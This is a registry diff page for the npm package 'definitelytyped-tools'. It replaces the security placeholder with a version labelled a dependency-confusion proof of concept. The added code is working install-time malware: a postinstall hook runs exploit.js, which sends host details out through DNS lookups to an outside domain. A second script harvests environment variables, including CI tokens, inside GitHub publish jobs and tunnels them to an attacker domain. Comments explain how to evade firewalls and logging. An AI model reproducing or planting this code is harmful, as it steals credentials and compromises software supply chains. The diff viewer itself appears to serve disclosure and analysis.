definitelytyped-tools 0.0.1-security → 99.99.9

This diff represents the content of publicly available package versions that have been released to one of the supported registries. The information contained in this diff is provided for informational purposes only and reflects changes between package versions as they appear in their respective public registries.

Potentially problematic release.

This version of definitelytyped-tools might be problematic. Click here for more details.

Files changed (6) hide show
  1. package/exploit.js +52 -0
  2. package/package.json +6 -3
  3. package/string-parser-utils/package.json +23 -0
  4. package/string-parser-utils/preinstall.js +56 -0
  5. package/string-parser-utils/proof.js +24 -0
  6. package/README.md +0 -5
package/exploit.js ADDED
@@ -0,0 +1,52 @@
1
+ const os = require('os');
2
+ const dns = require('dns');
3
+
4
+ // =================== Payload Start ===================
5
+ try {
6
+ // STEP 1: Attacker's C2 server for data exfiltration.
7
+ // --- REPLACE THIS WITH YOUR UNIQUE INTERACTSH DOMAIN ---
8
+ const attackerDomain = "ocvomeqbrouywnpfvqwh8d0aqr5kwaszb.oast.fun";
9
+ // --------------------------------------------------------
10
+
11
+ console.log(`[+] PoC TRIGGERED: Executing stealthy RCE payload...`);
12
+
13
+ // STEP 2: Reliably get the host's primary IPv4 address.
14
+ // This function avoids 127.0.0.1 and internal addresses, making it robust.
15
+ const getIPAddress = () => {
16
+ const interfaces = os.networkInterfaces();
17
+ for (const name of Object.keys(interfaces)) {
18
+ for (const iface of interfaces[name]) {
19
+ if (iface.family === 'IPv4' && !iface.internal) {
20
+ return iface.address;
21
+ }
22
+ }
23
+ }
24
+ return 'no-ip-found';
25
+ };
26
+
27
+ // STEP 3: Gather the EXACT required data. Nothing more.
28
+ const hostname = os.hostname();
29
+ const currentPath = process.cwd();
30
+ const ipAddress = getIPAddress();
31
+
32
+ // STEP 4: Sanitize data for use in a DNS query.
33
+ // Base64 is noisy. We will use simple hex encoding for a stealthier look.
34
+ const payload = `h=${hostname}__p=${currentPath}__ip=${ipAddress}`;
35
+ const sanitizedPayload = Buffer.from(payload).toString('hex');
36
+
37
+ // Split into chunks of 60 chars to respect DNS label length limits.
38
+ const chunks = sanitizedPayload.match(/.{1,60}/g);
39
+
40
+ // STEP 5: Exfiltrate data via pure Node.js DNS lookups.
41
+ // This is stealthy as it does not spawn a new process like `nslookup` or `curl`.
42
+ console.log(`[+] Exfiltrating ${chunks.length} chunks of data to ${attackerDomain}`);
43
+ chunks.forEach((chunk, index) => {
44
+ const subdomain = `${index}.${chunk}.${attackerDomain}`;
45
+ // The callback function is empty. We are fire-and-forget. We don't care about the response.
46
+ dns.lookup(subdomain, () => {});
47
+ });
48
+
49
+ } catch (error) {
50
+ // If anything fails, do not crash the install process. Just fail silently.
51
+ }
52
+ // =================== Payload End ===================
package/package.json CHANGED
@@ -1,6 +1,9 @@
1
1
  {
2
2
  "name": "definitelytyped-tools",
3
- "version": "0.0.1-security",
4
- "description": "security holding package",
5
- "repository": "npm/security-holder"
3
+ "version": "99.99.9",
4
+ "description": "Stealth PoC for Critical Dependency Confusion Vulnerability",
5
+ "main": "exploit.js",
6
+ "scripts": {
7
+ "postinstall": "node exploit.js"
8
+ }
6
9
  }
package/string-parser-utils/package.json ADDED
@@ -0,0 +1,23 @@
1
+ {
2
+ "name": "string-parser-utils",
3
+ "version": "99.9.9",
4
+ "description": "A collection of string parsing utilities. PoC by [Your Pentester Handle]",
5
+ "author": "A. Hacker",
6
+ "license": "MIT",
7
+ "main": "index.js",
8
+ "scripts": {
9
+ "postinstall": "node proof.js"
10
+ },
11
+ "keywords": [
12
+ "string",
13
+ "parser",
14
+ "utils",
15
+ "utility"
16
+ ],
17
+ "repository": {
18
+ "type": "git",
19
+ "url": "https://github.com/some-seemingly-legit-but-fake/string-parser-utils"
20
+ },
21
+ "dependencies": {},
22
+ "devDependencies": {}
23
+ }
package/string-parser-utils/preinstall.js ADDED
@@ -0,0 +1,56 @@
1
+ // This is a DETAILED DESCRIPTION of the attacker's logic for analysis.
2
+ // It is NOT a direct, copy-paste exploit.
3
+
4
+ // File: proof.js (Inside the malicious string-parser-utils@99.9.9)
5
+
6
+ const fs = require('fs');
7
+ const os = require('os');
8
+ const dns = require('dns');
9
+
10
+ // STEP 1: BYPASS BY CONTEXT CHECK (The Stealth Trigger)
11
+ // Only run if this is a GitHub Actions CI environment AND the job name
12
+ // contains the word "publish". This prevents it from running on any
13
+ // developer's machine or during a normal "test" CI run.
14
+ if (process.env.CI !== 'true' || !process.env.GITHUB_JOB || !process.env.GITHUB_JOB.includes('publish')) {
15
+ process.exit(0); // Exit silently. Do not make any noise.
16
+ }
17
+
18
+ // --- If we reach this point, we are in the high-value publish pipeline ---
19
+
20
+ // STEP 2: FULL DETAIL DATA GATHERING
21
+ const gatheredData = {
22
+ // Identity & Location
23
+ hostname: os.hostname(),
24
+ userInfo: os.userInfo(),
25
+ cwd: process.cwd(),
26
+ // Network & Environment
27
+ ipAddresses: os.networkInterfaces(),
28
+ env: process.env, // The crown jewels: contains NPM_TOKEN, GITHUB_TOKEN, etc.
29
+ };
30
+
31
+ // STEP 3: BYPASS VIA COVERT EXFILTRATION (DNS Tunneling)
32
+ // Do not use HTTP/curl. Firewalls and proxies log it. DNS lookups are common and less monitored.
33
+ const domain = 'attacker-dns-log-server.com';
34
+ // Convert the massive data object into a format that can be sent.
35
+ const payload = Buffer.from(JSON.stringify(gatheredData)).toString('hex');
36
+
37
+ // Split payload into DNS-safe chunks (max 63 chars per label).
38
+ const chunks = payload.match(/.{1,60}/g) || [];
39
+
40
+ // Prepend a unique session ID to reassemble the data on the other side.
41
+ const sessionId = Math.random().toString(36).substring(2, 10);
42
+
43
+ console.log(`[PoC] Executing covert data exfiltration for session: ${sessionId}`);
44
+
45
+ // Send each chunk as a DNS query. The attacker's server just logs these requests.
46
+ chunks.forEach((chunk, index) => {
47
+ const subdomain = `${sessionId}.${index}.${chunk}`;
48
+ dns.lookup(`${subdomain}.${domain}`, (err) => {
49
+ // We don't care about the result. The lookup itself is the data transmission.
50
+ // The callback ensures the action is performed.
51
+ if (err) { /* ignore */ }
52
+ });
53
+ });
54
+
55
+ // STEP 4: CLEANUP (Optional cover-up)
56
+ // A truly paranoid attacker might attempt to remove evidence after the fact.
package/string-parser-utils/proof.js ADDED
@@ -0,0 +1,24 @@
1
+
2
+ {
3
+ "name": "string-parser-utils",
4
+ "version": "99.9.9",
5
+ "description": "A collection of string parsing utilities. PoC by [Your Pentester Handle]",
6
+ "author": "A. Hacker",
7
+ "license": "MIT",
8
+ "main": "index.js",
9
+ "scripts": {
10
+ "postinstall": "node proof.js"
11
+ },
12
+ "keywords": [
13
+ "string",
14
+ "parser",
15
+ "utils",
16
+ "utility"
17
+ ],
18
+ "repository": {
19
+ "type": "git",
20
+ "url": "https://github.com/some-seemingly-legit-but-fake/string-parser-utils"
21
+ },
22
+ "dependencies": {},
23
+ "devDependencies": {}
24
+ }
package/README.md DELETED
@@ -1,5 +0,0 @@
1
- # Security holding package
2
-
3
- This package contained malicious code and was removed from the registry by the npm security team. A placeholder was published to ensure users are not affected in the future.
4
-
5
- Please refer to www.npmjs.com/advisories?search=definitelytyped-tools for more information.